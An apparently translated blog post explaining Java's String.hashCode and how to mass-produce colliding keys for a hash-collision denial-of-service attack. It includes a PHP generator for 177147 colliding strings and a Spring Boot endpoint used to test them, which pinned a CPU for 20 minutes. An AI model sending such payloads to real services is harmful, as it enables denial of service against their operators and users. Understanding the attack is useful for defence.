Data Production of Java Hash Collision

Posted by SpectralDesign.Net on Tue, 25 Jun 2019 21:03:02 +0200

In the previous article, An Advanced DoS Attack-Hash Collision Attack, I carried out a DoS attack on Java using forged hash collision data. This article shows how to produce a large amount of that attack data.

HashTable is a very common data structure. It offers fast access and a simple structure, which makes it popular with programmers. Its basic mechanism is as follows:

A hash function converts keys of various types into an address within a finite space. Well-known hash functions include MD5 and SHA*. However, MD5 and SHA* are rarely used in a HashTable because they are too time-consuming; most programming languages instead choose a Times*-style algorithm such as Times 31, Times 33 or Times 37. The hash algorithm Java uses for strings is Times 31, and the one PHP uses is Times 33.

Used properly, a HashTable is a nearly perfect data structure. But sometimes it is used abnormally, for example when it is under attack. Suppose the keys "layne" and "abbc" are mapped to the same address by the hash algorithm; the program then cannot tell which key's value to return. To handle this, the concept of a Bucket (a linked list) is introduced: when several keys map to the same address, their entries are stored in the same Bucket list. This solves the lookup problem but adds extra work, because every lookup or insert has to walk the list and compare keys one by one. When hundreds of thousands or even millions of entries land in the same Bucket, the effect on the HashTable is fatal: inserting n colliding keys takes on the order of n^2 comparisons, the amount of computation rises dramatically, and the CPU is exhausted within minutes.
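The cost of a single overloaded Bucket can be illustrated with a toy table. The sketch below is not Java's real HashMap; BucketDemo, countComparisons and the slot counts are names and values assumed purely for illustration. It counts key comparisons when keys are spread over many slots and when every key is forced into the same Bucket.

```java
import java.util.ArrayList;
import java.util.List;

class BucketDemo {
    // Inserts every key into a toy chained table and returns the number of
    // key comparisons performed. With forceCollision, all keys share slot 0.
    static long countComparisons(List<String> keys, int slots, boolean forceCollision) {
        List<List<String>> table = new ArrayList<>();
        for (int i = 0; i < slots; i++) {
            table.add(new ArrayList<>());
        }
        long comparisons = 0;
        for (String key : keys) {
            int slot = forceCollision ? 0 : Math.floorMod(key.hashCode(), slots);
            List<String> bucket = table.get(slot);
            boolean found = false;
            for (String existing : bucket) { // walk the bucket, as a lookup would
                comparisons++;
                if (existing.equals(key)) {
                    found = true;
                    break;
                }
            }
            if (!found) {
                bucket.add(key);
            }
        }
        return comparisons;
    }

    public static void main(String[] args) {
        List<String> keys = new ArrayList<>();
        for (int i = 0; i < 2000; i++) {
            keys.add("key" + i);
        }
        System.out.println("spread out: " + countComparisons(keys, 4096, false));
        // 0 + 1 + ... + 1999 comparisons when everything shares one bucket
        System.out.println("one bucket: " + countComparisons(keys, 4096, true)); // one bucket: 1999000
    }
}
```

With 2000 keys the single-bucket case already needs about two million comparisons, and the count grows quadratically with the number of keys.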

By studying the hash algorithm that underlies the HashTable in each language, an attacker can produce matching attack data, which is hard to defend against. Once we understand how the attack works, however, we can still cope with it well.

1. Implementation of the Java hashCode function

A quick Google search turns up the hash algorithm used by Java's HashTable. In Java, every object has a method called hashCode(), which we can call directly:

System.out.println("it2048.cn".hashCode());

Under the hood, String's hashCode() uses the Times 31 algorithm. As for why 31 was chosen, the commonly cited reason is that 31 * i == (i << 5) - i, so the multiplication can be replaced by a shift and a subtraction, which is faster. The source code is as follows:

/**
 * Returns a hash code for this string. The hash code for a
 * <code>String</code> object is computed as
 * <blockquote><pre>
 * s[0]*31^(n-1) + s[1]*31^(n-2) + ... + s[n-1]
 * </pre></blockquote>
 * using <code>int</code> arithmetic, where <code>s[i]</code> is the
 * <i>i</i>th character of the string, <code>n</code> is the length of
 * the string, and <code>^</code> indicates exponentiation.
 * (The hash value of the empty string is zero.)
 *
 * @return  a hash code value for this object.
 */
public int hashCode() {
    int h = hash;
    if (h == 0 && value.length > 0) {
        char val[] = value;

        for (int i = 0; i < value.length; i++) {
            h = 31 * h + val[i];
        }
        hash = h;
    }
    return h;
}

The core formula is:

s[0]*31^(n-1) + s[1]*31^(n-2) + ... + s[n-1]

It can be rewritten as a recurrence, where F(n) is the hash of the first n characters and F(0) = 0:

F(n) = 31*F(n-1) + s[n-1]

The same calculation implemented in PHP (only to emphasize that the formulas underlying these hash algorithms are very simple):

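// Assumes 64-bit PHP and ASCII input (ord() works on bytes, Java on chars)
function hashCode($str) {
    $h = 0;
    $len = strlen($str);
    for ($i = 0; $i < $len; $i++) {
        // 31 * h + c, keeping only the low 32 bits like a Java int
        $h = ((($h << 5) - $h) + ord($str[$i])) & 0xFFFFFFFF;
    }
    // Reinterpret the unsigned 32-bit value as a signed Java int
    if ($h >= 0x80000000) $h -= 0x100000000;
    return $h;
}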
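For comparison, the recurrence can also be written directly in Java and checked against the built-in String.hashCode(). This is a minimal sketch; Times31Demo and times31 are names made up for the example, and the shift form is used only to show that it matches multiplication by 31 under int overflow.

```java
class Times31Demo {
    // F(n) = 31*F(n-1) + s[n-1] with F(0) = 0, using Java int arithmetic.
    static int times31(String s) {
        int h = 0;
        for (int i = 0; i < s.length(); i++) {
            h = (h << 5) - h + s.charAt(i); // same value as 31 * h + s.charAt(i)
        }
        return h;
    }

    public static void main(String[] args) {
        String sample = "it2048.cn";
        // The hand-written loop agrees with the JDK implementation
        System.out.println(times31(sample) == sample.hashCode()); // prints true
    }
}
```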

2. Working backwards from the Java hashCode function

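Starting from the recurrence

F(n) = 31*F(n-1) + s[n-1]

we can further derive the following identity:

31*x + y = 31*(x+1) + (y-31) = 31*(x+2) + (y-62)

In other words, raising one character code by 1 and lowering the next one by 31 leaves the hash unchanged.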

It is easy to find three two-character ASCII strings that satisfy this condition, namely:

at = 97*31 + 116 = 3123

bU = 98*31 + 85 = 3123

c6 = 99*31 + 54 = 3123
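The three pairs can also be found mechanically. The following sketch (PairSearch and findPairs are hypothetical names, and restricting the search to printable ASCII codes 32 to 126 is an assumption of the example) tries every first character x and solves 31*x + y = target for the second character y.

```java
import java.util.ArrayList;
import java.util.List;

class PairSearch {
    // Returns every two-character printable-ASCII string whose hashCode is target.
    static List<String> findPairs(int target) {
        List<String> pairs = new ArrayList<>();
        for (char x = 32; x <= 126; x++) {
            int y = target - 31 * x;       // second character needed for this x
            if (y >= 32 && y <= 126) {     // keep it only if y is printable too
                pairs.add("" + x + (char) y);
            }
        }
        return pairs;
    }

    public static void main(String[] args) {
        System.out.println("at".hashCode());                // prints 3123
        System.out.println(findPairs("at".hashCode()));     // prints [at, bU, c6]
    }
}
```

Within the printable range there are exactly these three solutions, because y moves by 31 for every step of x and quickly leaves the range.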

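From the data above, we can in theory build colliding strings of any even length, because replacing one two-character block with another block of the same hash leaves the hash of the whole string unchanged. For example: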

  1. atatatatatatatat (16 characters)
  2. c6atatatatatatbU (16 characters)
  3. atatatatatatbUat (16 characters)
  4. c6c6c6c6c6c6bUat (16 characters)
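A quick way to convince yourself is to compare the hash codes of a few 16-character strings built from the three blocks. This is only a sketch; EvenLengthDemo and sameHash are illustrative names, not part of any library.

```java
class EvenLengthDemo {
    // True when every given key has the same String.hashCode().
    static boolean sameHash(String... keys) {
        for (String key : keys) {
            if (key.hashCode() != keys[0].hashCode()) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        // Four 16-character strings assembled from the blocks at, bU and c6
        System.out.println(sameHash(
                "atatatatatatatat",
                "c6atatatatatatbU",
                "atatatatatatbUat",
                "c6c6c6c6c6c6bUat")); // prints true
    }
}
```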

Since all of the 16-character strings above have the same hashCode, in theory we can build pow(3,16/2) = 6561 such strings; with 22-character strings we get pow(3,22/2) = 177147, which is enough to launch a simple attack. Next, we wrap this in a simple function that generates the 177147 attack strings.

3. Mass production of collision data through scripts

Now that we have derived the equation behind the collision data, I generate the data quickly with PHP. It is better not to generate the collision data with Java here, because a careless step can turn the script into an attack on itself.

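$arr_src = ['at', 'bU', 'c6'];      // Three blocks that share the hash 3123
$arr_rtn = [];                      // Collected strings, stored as key => 0
combs(11, $arr_src, '', $arr_rtn);  // 11 blocks -> 3^11 = 177147 keys of length 22

/**
 * Combination algorithm: recursively appends every choice of $n blocks
 * to $str and records each finished string as a key of $arr_rtn.
 **/
function combs($n, $arr, $str, &$arr_rtn) {
    foreach ($arr as $block) {
        if ($n == 1) {
            $arr_rtn[$str . $block] = 0;
        } else {
            combs($n - 1, $arr, $str . $block, $arr_rtn);
        }
    }
}

$json = json_encode($arr_rtn);
file_put_contents('log/times31.txt', $json);  // The log/ directory must already exist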

In the end we generated the following data (only the first few entries are shown):

{
    "atatatatatatatatatatat":0,
    "atatatatatatatatatatbU":0,
    "atatatatatatatatatatc6":0,
    "atatatatatatatatatbUat":0,
    "atatatatatatatatatbUbU":0,
    "atatatatatatatatatbUc6":0,
    "atatatatatatatatatc6at":0,
    "atatatatatatatatatc6bU":0,
    "atatatatatatatatatc6c6":0,
    "atatatatatatatatbUatat":0,
    "atatatatatatatatbUatbU":0,
    "atatatatatatatatbUatc6":0,
    "atatatatatatatatbUbUat":0,
    "atatatatatatatatbUbUbU":0,
    "atatatatatatatatbUbUc6":0,
    "atatatatatatatatbUc6at":0
}
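For a small-scale cross-check on the Java side, the same enumeration can be sketched iteratively by treating each index as a base-3 number. CollisionGenerator and generate are hypothetical names, and the example deliberately uses only 4 blocks (81 strings) and a plain list, so that it does not load a hash-based collection with a large number of colliding keys.

```java
import java.util.ArrayList;
import java.util.List;

class CollisionGenerator {
    static final String[] BLOCKS = {"at", "bU", "c6"};

    // Builds all 3^blocks strings made of the given number of two-character blocks.
    // Intended for small values; the int counter overflows beyond 19 blocks.
    static List<String> generate(int blocks) {
        int total = 1;
        for (int i = 0; i < blocks; i++) {
            total *= 3;
        }
        List<String> out = new ArrayList<>(total);
        for (int index = 0; index < total; index++) {
            char[] buf = new char[blocks * 2];
            int rest = index;
            // Fill from the last block backwards: the lowest base-3 digit picks the last block
            for (int pos = blocks - 1; pos >= 0; pos--) {
                String block = BLOCKS[rest % 3];
                buf[2 * pos] = block.charAt(0);
                buf[2 * pos + 1] = block.charAt(1);
                rest /= 3;
            }
            out.add(new String(buf));
        }
        return out;
    }

    public static void main(String[] args) {
        List<String> keys = generate(4);
        System.out.println(keys.size());        // prints 81
        System.out.println(keys.subList(0, 3)); // prints [atatatat, atatatbU, atatatc6]
        boolean same = true;
        for (String key : keys) {
            same &= key.hashCode() == keys.get(0).hashCode();
        }
        System.out.println(same);               // prints true
    }
}
```

The order matches the PHP output: the last block changes fastest, cycling through at, bU and c6.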

4. Testing collision data in Java

With the script we generated 177147 colliding strings, and then ran a simple test in Spring Boot. The test code is as follows:

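import java.io.BufferedReader;
import java.io.FileReader;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;

import net.sf.json.JSONObject; // Assumed: fromObject() matches json-lib's JSONObject
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.RestController;

@RestController // Assumed: the class-level annotation is not shown in the original snippet
public class IndexController {

    @RequestMapping(value="/",method = RequestMethod.GET)
    public String index(){

        String jsonStr = "";
        // The generated file holds the whole JSON object on a single line
        try (BufferedReader br = new BufferedReader(new FileReader("times31.txt"))) {
            jsonStr = br.readLine();
        } catch (IOException e) {
            System.out.println("Could not read times31.txt: " + e.getMessage());
        }

        // Parsing the JSON puts every colliding key into a map
        Map<String, Object> map = new HashMap<String, Object>();
        map = JSONObject.fromObject(jsonStr);

        return "Hash Collision ~";
    }
}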

In the test, one CPU was pinned at 100% for more than 20 minutes. The Mac Pro heated up immediately and its fan spun up. Once the java process was terminated, the computer returned to normal.

Previous article: An Advanced DoS Attack-Hash Collision Attack

To be continued...
